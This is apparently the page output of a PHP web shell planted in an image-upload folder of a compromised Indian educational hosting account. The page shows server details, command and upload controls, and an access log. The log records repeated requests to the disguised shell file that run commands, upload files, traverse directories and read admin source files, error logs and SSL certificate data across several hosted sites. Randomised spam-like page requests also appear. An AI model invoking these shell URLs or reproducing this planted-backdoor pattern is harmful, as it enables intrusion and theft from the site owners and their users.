Server IP : 103.191.208.50 / Your IP : 216.73.216.53 Web Server : LiteSpeed System : Linux orion.herosite.pro 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64 User : celkcksm ( 1031) PHP Version : 7.4.33 Disable Function : show_source, system, shell_exec, passthru, popen, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/celkcksm/access-logs/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
202.76.168.136 - - [29/Jun/2025:17:38:32 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?komend=gaskan&path=/home/celkcksm/rin.org.in/../demoadmin.ncriptech.com/routes HTTP/1.1" 200 2694 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
157.55.39.194 - - [29/Jun/2025:17:38:48 +0530] "GET /qahfu/land-deed-1.php HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
202.76.130.184 - - [29/Jun/2025:17:38:57 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=//dev/shm&upload=gaskan HTTP/1.1" 200 2474 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
202.76.143.245 - - [29/Jun/2025:17:39:21 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=//etc/profile.d/../pki/nssdb HTTP/1.1" 200 2550 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16"
52.167.144.212 - - [29/Jun/2025:17:39:33 +0530] "GET /133/principle.php HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
202.76.136.11 - - [29/Jun/2025:17:40:12 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=//lib/jvm/../.build-id/bc HTTP/1.1" 200 3266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2"
146.174.189.231 - - [29/Jun/2025:17:40:37 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=//lib64/dovecot/../gtk-3.0&upload=gaskan HTTP/1.1" 200 2672 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
202.76.134.155 - - [29/Jun/2025:17:41:02 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=//lib64/gssproxy/../samba/ldb HTTP/1.1" 200 2151 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1"
146.174.173.172 - - [29/Jun/2025:17:41:26 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/celkcksm/.cl.selector/../mail/.Drafts HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (Windows NT 6.0) yi; AppleWebKit/345667.12221 (KHTML, like Gecko) Chrome/23.0.1271.26 Safari/453667.1221"
202.76.183.24 - - [29/Jun/2025:17:41:51 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/celkcksm/public_html/../gitanjalicollegeedu.org/.. HTTP/1.1" 200 7269 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2"
157.55.39.194 - - [29/Jun/2025:17:41:59 +0530] "GET /afvug/student_attendance.php HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
202.76.143.160 - - [29/Jun/2025:17:42:17 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/celkcksm/public_html/../gtsgmbh.ncriptech.com HTTP/1.1" 200 2810 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-PT; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
157.55.39.194 - - [29/Jun/2025:17:42:28 +0530] "GET /newfundweb/principle.php?help/ HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
202.76.180.149 - - [29/Jun/2025:17:42:42 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/celkcksm/rin.org.in/../.local/share HTTP/1.1" 200 2225 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.612.1 Safari/534.15"
52.167.144.141 - - [29/Jun/2025:17:43:23 +0530] "GET /type/mandatory-disclosure.php HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.107 - - [29/Jun/2025:17:48:10 +0530] "GET /newfundweb/fee_structure.php?grfvi/a2443180.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.132 - - [29/Jun/2025:17:49:44 +0530] "GET /foreign/teaching-staff.php?ycwph/k530682.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.92 - - [29/Jun/2025:17:49:59 +0530] "GET /donation/course.php HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
114.119.167.239 - - [29/Jun/2025:17:52:24 +0530] "GET /fwykdv142avcu16372/admin/images/news_read.php?upid=5 HTTP/1.1" 200 4345 "https://www.jcboseedu.org/fwykdv142avcu16372/admin/images/d-ed.php" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
162.120.184.207 - - [29/Jun/2025:17:55:47 +0530] "GET /about-institute.php HTTP/2" 200 3770 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
114.119.147.87 - - [29/Jun/2025:18:00:32 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/../home3/../bin/../selector/../lib64/ImageMagick-6.9.13/../libuser HTTP/1.1" 200 2536 "https://jcboseedu.org/admin/images/gallery/1738041542_anopas.PhP?path=/home/../home3/../bin/../selector/../lib64/ImageMagick-6.9.13/.." "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.137.8 - - [29/Jun/2025:18:02:33 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=//usr/lib/.build-id/64/../2c/../7d HTTP/1.1" 200 3288 "https://jcboseedu.org/admin/images/gallery/1738041542_anopas.PhP?path=//usr/lib/.build-id/64/../2c/.." "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
52.167.144.202 - - [29/Jun/2025:18:05:05 +0530] "GET /newfundweb/fee_structure.php?whkgr/g847280.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
114.119.137.8 - - [29/Jun/2025:18:06:36 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=//lib/jvm/../python2.7/../.build-id/86/../e0/../b1 HTTP/1.1" 200 3732 "https://jcboseedu.org/admin/images/gallery/1738041542_anopas.PhP?path=//lib/jvm/../python2.7/../.build-id/86/../e0/.." "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
40.77.167.12 - - [29/Jun/2025:18:08:24 +0530] "GET /newfundweb/fee_structure.php?yqkpv/j451537.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.56 - - [29/Jun/2025:18:09:21 +0530] "GET /xassf/mandatory-disclosure.php HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.56 - - [29/Jun/2025:18:10:31 +0530] "GET /123btU1976435fghwd-vz/land-deed-6.php?shop/ HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
114.119.153.212 - - [29/Jun/2025:18:10:39 +0530] "GET /23gfqtybvrslidpx31043/images/income_and_expense.php HTTP/1.1" 200 4345 "https://www.jcboseedu.org/23gfqtybvrslidpx31043/images/news_read.php?upid=5" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
40.77.167.12 - - [29/Jun/2025:18:16:45 +0530] "GET /newfundweb/fee_structure.php?cftnr/r1950029.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.56 - - [29/Jun/2025:18:17:52 +0530] "GET /newfundweb/fee_structure.php?hbeyi/y1961138.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.102 - - [29/Jun/2025:18:19:52 +0530] "GET /newfundweb/fee_structure.php?kiphr/h444567.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.225 - - [29/Jun/2025:18:20:57 +0530] "GET /newfundweb/fee_structure.php?cupdj/i3120410.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
17.241.219.223 - - [29/Jun/2025:18:27:25 +0530] "GET /robots.txt HTTP/1.1" 200 67 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.223 - - [29/Jun/2025:18:27:25 +0530] "GET /Aml/land-deed-4.php HTTP/1.1" 200 4345 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
207.46.13.102 - - [29/Jun/2025:18:28:05 +0530] "GET /newfundweb/fee_structure.php?numjs/t650161.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.102 - - [29/Jun/2025:18:28:24 +0530] "GET /newfundweb/fee_structure.php?vwatf/b962715.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.79.172 - - [29/Jun/2025:18:30:48 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/celkcksm/jrslawcollege.com/uploads/faculty_image&komend=gaskan HTTP/1.1" 200 18607 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.55.39.57 - - [29/Jun/2025:18:31:13 +0530] "GET /bbxiz/director.php HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
114.119.153.212 - - [29/Jun/2025:18:31:24 +0530] "GET /123ZjPoMTQb37158hrp_lsey/images/chairman.php HTTP/1.1" 200 4345 "https://www.jcboseedu.org/123ZjPoMTQb37158hrp_lsey/images/land-deed-5.php" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.79.170 - - [29/Jun/2025:18:31:57 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=/home/celkcksm/ssl/certs/_wildcard__aamodernschool_com_c0a4c_ced7f_1755870258_85172431fef490295782da2277ede389.crt.cache&path=/home/celkcksm/ssl/certs HTTP/1.1" 200 4450 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [29/Jun/2025:18:32:22 +0530] "GET /robots.txt HTTP/2" 200 67 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:32:23 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fcms.ncriptech.com HTTP/2" 200 3142 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:32:23 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2FLanguage.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3206 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:32:23 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Ffunctions.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 1807 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:32:23 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fhome_slider.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.55.39.57 - - [29/Jun/2025:18:32:34 +0530] "GET /newfundweb/fee_structure.php?ghucs/m2245358.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.57 - - [29/Jun/2025:18:32:34 +0530] "GET /xhkpm/infrastructure.php HTTP/2" 200 3840 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.53 - - [29/Jun/2025:18:33:54 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fusersreports.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3145 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:33:54 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fusercreate.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 4103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:33:54 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fecampus.ncriptech.com HTTP/2" 200 3025 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:33:54 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fdemo.ncriptech.com HTTP/2" 200 2247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.170 - - [29/Jun/2025:18:33:56 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=/home/celkcksm/jrslawcollege.com/uploads/gallery/gal-75.jpg&path=/home/celkcksm/jrslawcollege.com/uploads/gallery HTTP/1.1" 200 1615 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [29/Jun/2025:18:34:46 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Flogout.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 1661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:34:46 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fheader.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:34:46 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2FDashboard.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 2450 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:34:46 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fprinciple.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3596 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.153.212 - - [29/Jun/2025:18:35:27 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=//lib/jvm/../.build-id/76/../8d/../a8/../ae HTTP/1.1" 200 3329 "https://jcboseedu.org/admin/images/gallery/1738041542_anopas.PhP?path=//lib/jvm/../.build-id/76/../8d/../a8/.." "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.53 - - [29/Jun/2025:18:35:53 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fstudentcorner.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3777 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:35:53 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Faddmenu.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3230 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:35:53 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2FChangePassword.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 2341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:35:54 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fcloudcampus.ncriptech.com HTTP/2" 200 1965 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:36:48 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fabout_us.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:36:48 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fstudent_attendance.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:36:48 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fdemoadmin.ncriptech.com HTTP/2" 200 3243 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:36:48 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Ferror_log&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 5512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
98.80.216.119 - - [29/Jun/2025:18:37:23 +0530] "GET /aml HTTP/1.1" 200 4345 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
98.80.216.119 - - [29/Jun/2025:18:37:23 +0530] "GET /Aml HTTP/1.1" 200 4338 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"
52.167.144.156 - - [29/Jun/2025:18:37:27 +0530] "GET /newfundweb/fee_structure.php?jcitd/w512676.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.53 - - [29/Jun/2025:18:37:53 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fgallery.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3806 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:37:53 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fattendance.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3456 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:37:53 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2F.wp-toolkit-identifier&path=%2Fhome%2Fcelkcksm HTTP/2" 200 2164 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:37:53 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fdocuments.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3361 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.170 - - [29/Jun/2025:18:38:29 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/celkcksm/bmtrust.org.in/blog/ways-in-which-boarding-schools-in-dehradun-are-good-for-students/.. HTTP/1.1" 200 3277 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.172 - - [29/Jun/2025:18:39:38 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/celkcksm/bmtrust.org.in/blog/7-skills-essential-for-teachers-in-the-modern-scenario&komend=gaskan HTTP/1.1" 200 2283 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [29/Jun/2025:18:40:23 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fadmission_query.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 2660 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:40:23 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fcontact_us.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3614 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
